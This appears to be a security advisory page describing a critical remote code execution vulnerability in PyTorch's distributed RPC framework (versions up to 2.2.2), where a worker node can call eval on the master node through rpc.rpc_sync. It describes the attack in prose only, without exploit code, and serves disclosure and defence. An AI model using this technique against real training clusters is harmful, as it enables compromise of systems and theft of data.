Critical Severity

pytorch

Remote Code Execution in Distributed RPC Framework

A vulnerability in PyTorch's torch.distributed.rpc framework allows remote code execution by exploiting the lack of function verification during RPC calls. This issue affects versions up to and including 2.2.2. Attackers can execute arbitrary commands on master nodes in distributed training scenarios by calling built-in Python functions like eval. The vulnerability was identified in the framework's handling of RPC calls, where arbitrary functions could be executed without proper validation.

Available publicly on May 31 2024

Threat Overview

The torch.distributed.rpc framework in PyTorch is designed for distributed training, enabling RPC communication between nodes. However, the framework does not validate the functions being called during RPC operations, allowing attackers to execute arbitrary Python functions on remote nodes. This vulnerability is particularly dangerous because it can be exploited to execute commands like eval, leading to remote code execution (RCE) on master nodes. The lack of function verification and security filtering in the RPC call process exposes master nodes to potential compromise, posing a significant threat to the integrity and security of distributed training environments.

Attack Scenario

An attacker, by controlling a worker node in a distributed training setup, can exploit this vulnerability to execute arbitrary commands on the master node. The attacker initiates an RPC call from the worker to the master, using rpc.rpc_sync to invoke the eval function with malicious code as arguments. This results in the execution of the arbitrary code on the master node, potentially compromising the node and allowing the attacker to steal sensitive data or further infiltrate the network.

Who is affected

The vulnerability affects master nodes in distributed training environments using PyTorch's torch.distributed.rpc framework, specifically versions up to and including 2.2.2. Developers and organizations utilizing this framework for distributed training scenarios, such as reinforcement learning, model parallelism, and parameter server training frameworks, are at risk of having their master nodes compromised.

Technical Report
Want more out of Sightline?

Sightline offers even more for premium customers

Go Premium

We have - related security advisories that are available with Sightline Premium.